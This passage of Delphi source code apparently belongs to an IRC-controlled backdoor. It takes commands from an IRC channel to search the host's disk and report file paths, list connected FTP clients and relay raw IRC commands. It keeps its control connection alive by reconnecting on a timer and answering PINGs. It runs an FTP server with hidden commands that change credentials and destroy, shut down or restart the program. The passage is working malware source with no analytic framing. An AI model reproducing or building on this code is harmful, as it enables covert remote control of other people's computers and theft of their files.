     param2:=trim(copy(param,pos(' ',param),length(param)));
     tcp.sendstr('PRIVMSG '+trim(origin)+' :Searching for '+param1+' in '+param2+'. I will notify you the result as soon as possible... '+#13#10);
     search_origin:=origin;
     search.directory:=param2;
     search.files:=param1;
     search.Stop;
     search.Scan;
    end else

    //Stop searching
    if copy(uppercase(cmd),1,8)='STOPFIND' then begin
     if not search.InProcess then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :No search processes running here....'+ #13#10); exit; end;
     if uppercase(trim(origin))<>uppercase(trim(search_origin)) then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Only the owner of search process can do this!!'+ #13#10); exit; end;
     search.Stop;
     tcp.SendStr('PRIVMSG '+trim(origin)+' :FIND: Search task killed.'+ #13#10);
    end else

    //List IP of clients connected to FTP server
    if copy(uppercase(cmd),1,9)='CLIENTSIP' then begin
     if ftp.clientcount=0 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :No clients connected to the FTP server...'+ #13#10); exit; end;
     tcp.SendStr('PRIVMSG '+trim(origin)+' :Listing IP number of clients connected here:'+ #13#10);
     for ct:=0 to clients_ip_list.items.count-1 do tcp.SendStr('PRIVMSG '+trim(origin)+' :'+clients_ip_list.items[ct]+#13#10);
    end else

    //Quote commands to IRC server
    if copy(uppercase(cmd),1,5)='QUOTE' then begin
     if length(cmd)=5 then begin tcp.SendStr('PRIVMSG '+trim(origin)+' :Insufficient parameters!'+ #13#10); exit; end;
     param:=trim(copy(cmd,6,length(s)));
     tcp.sendstr(param + #13#10);
     tcp.SendStr('PRIVMSG '+trim(origin)+' :Command quoted.'+ #13#10);
    end else

    //Command not recognized
    tcp.SendStr('PRIVMSG '+trim(origin)+' :'+'Uh?! I don''t understand "'+cmd+'"! Try typing HELPME....'+#13#10);

 end else

    //Authentication failure
    tcp.SendStr('PRIVMSG '+trim(origin)+' :'+'Uh?! Who r u?! Leave me alone...'+#13#10);

 end;

 //Reply to Ping to keep the connection active
 if pos('PING :',uppercase(s) )<>0 then tcp.SendStr('PONG '+copy(s,pos('PING :',uppercase(s))+1,length(s))+#13#10);

end;

procedure TForm1.tcpBgException(Sender: TObject; E: Exception;
  var CanClose: Boolean);
begin
  tcp.close;
end;

procedure TForm1.tcpError(Sender: TObject);
begin
  tcp.close;
end;

procedure TForm1.Timer1Timer(Sender: TObject);
var
 ct:integer;

begin
 if attempting then exit;
 if not useirc then begin timer1.enabled:=false; exit; end;
 if not connected and (tcp.state=wsconnected) then tcp.close;

 if Connected and (tcp.state<>wsconnected) then begin
    Attempting:=true;

    tcp.close; tcp.addr:=server; tcp.port:=port;
    try tcp.Connect;
     except begin useirc:=false; timer1.enabled:=false; exit; end;
    end;

    ct:=0;
    repeat
     application.processmessages;
     sleep(10);
     inc(ct);
    until (ct>3000) or (tcp.state=wsconnected);
    Attempting:=false;

 end;
end;

procedure TForm1.tcpSessionClosed(Sender: TObject; Error: Word);
begin
 tcp.close;
 timer1.enabled:=true;
end;

procedure TForm1.FtpAuthenticate(Sender: TObject; Client: TFtpCtrlSocket;
  UserName, Password: TFtpString; var Authenticated: Boolean);
var
 ct:integer;
 is_here:boolean;

begin
 Authenticated:=false;
 if (UserName=FtpUser) and (PassWord=FtpPassWord) then authenticated:=true;
 if (username='anonymous') and (ftpuser='anonymous') then authenticated:=true;
 is_here:=false; if clients_ip_list.items.count>0 then for ct:=0 to clients_ip_list.items.count-1 do if clients_ip_list.items[ct]=client.GetPeerAddr then is_here:=true;
 if not is_here then clients_ip_list.items.Add(client.getpeeraddr);
end;

procedure TForm1.FormClose(Sender: TObject; var Action: TCloseAction);
begin
 AppShutDown;
end;

procedure TForm1.searchFileFound(AName, APath: String; AAttr,
  ASize: Integer; ADateTime: TDateTime);
begin
 tcp.sendstr('PRIVMSG '+trim(search_origin)+' :FIND: '+apath+'\'+aname+'  '+inttostr(asize)+' bytes  '+ datetimetostr(adatetime)+#13#10);
end;

procedure TForm1.searchProcessDone(ACount, ASize: Cardinal);
begin
 tcp.sendstr('PRIVMSG '+trim(search_origin)+' :FIND: Process done!'+#13#10);
end;

procedure TForm1.tcpSendData(Sender: TObject; BytesSent: Integer);

begin
 //Avoid IRC Flooding....
  sleep(800);
end;

procedure TForm1.FtpClientDisconnect(Sender: TObject;
  Client: TFtpCtrlSocket; Error: Word);
var
 ct,ct2:integer;

begin
 ct2:=-1;
 for ct:=0 to clients_ip_list.items.count-1 do if clients_ip_list.items[ct]=client.GetPeerAddr then ct2:=ct;
 if ct2<>-1 then clients_ip_list.items.Delete(ct2);
end;

procedure TForm1.FtpClientCommand(Sender: TObject; Client: TFtpCtrlSocket;
  var Keyword, Params, Answer: TFtpString);

var
 param2,param3:string;

begin
 //Change USER:PASS
 if uppercase(keyword)='CHUP' then begin
  if (params='') or (pos(':',params)=0) then begin answer:='501 Insufficient or invalid parameters.'; exit; end;
  param2:=copy(params,1,pos(':',params)-1); param3:=copy(params,pos(':',params)+1,length(params));
  if (length(param2)>16) or (length(param3)>16) then begin answer:='501 Parameters too long.'; exit; end;
  answer:='200 Username changed from "'+ ftpuser + '" to "' + param2 + '". Password changed from "' + ftppassword + '" to "'+param3+'".';
  ftpuser:=param2; ftppassword:=param3; SaveConfig;
 end;

 //Destroy
 if uppercase(keyword)='DSTR' then begin
  answer:='200 Destroying....';
  AppDestroy;
  exit;
 end;

 //Shutdown
 if uppercase(keyword)='SHTD' then begin
  answer:='200 Shutting down...';
  AppShutdown;
  exit;
 end;

 //Restart
 if uppercase(keyword)='RSTR' then begin
  answer:='200 Restarting....';
  AppRestart;
  exit;
 end;

end;

end.
